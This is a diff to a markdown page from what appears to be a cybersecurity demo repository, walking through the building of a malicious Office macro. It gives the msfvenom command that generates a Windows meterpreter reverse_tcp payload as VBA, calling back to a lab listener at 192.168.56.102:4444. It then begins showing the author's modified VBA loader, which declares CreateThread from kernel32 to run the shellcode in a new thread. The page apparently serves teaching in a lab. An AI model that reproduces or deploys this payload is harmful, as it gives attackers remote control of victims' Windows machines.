EnricoPiccin02/Cybersecurity-Demo/home.md

 ```
 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.56.102 LPORT=4444 -f vba > reverse_shell_exploit.vba
 ```
-This command generates a VBA script that attempts to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
-To enhance its effectiveness, I modified the script to launch a thread to manage this connection:
+This command generates a VBA script that, when executed, attempts to establish a TCP connection to the pair `<IPv4, Port> = <192.168.56.102, 4444>`.
+To enhance its effectiveness, I modified the script to launch a thread to manage the connection:
 ```vb
 #If VBA7 Then
     Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr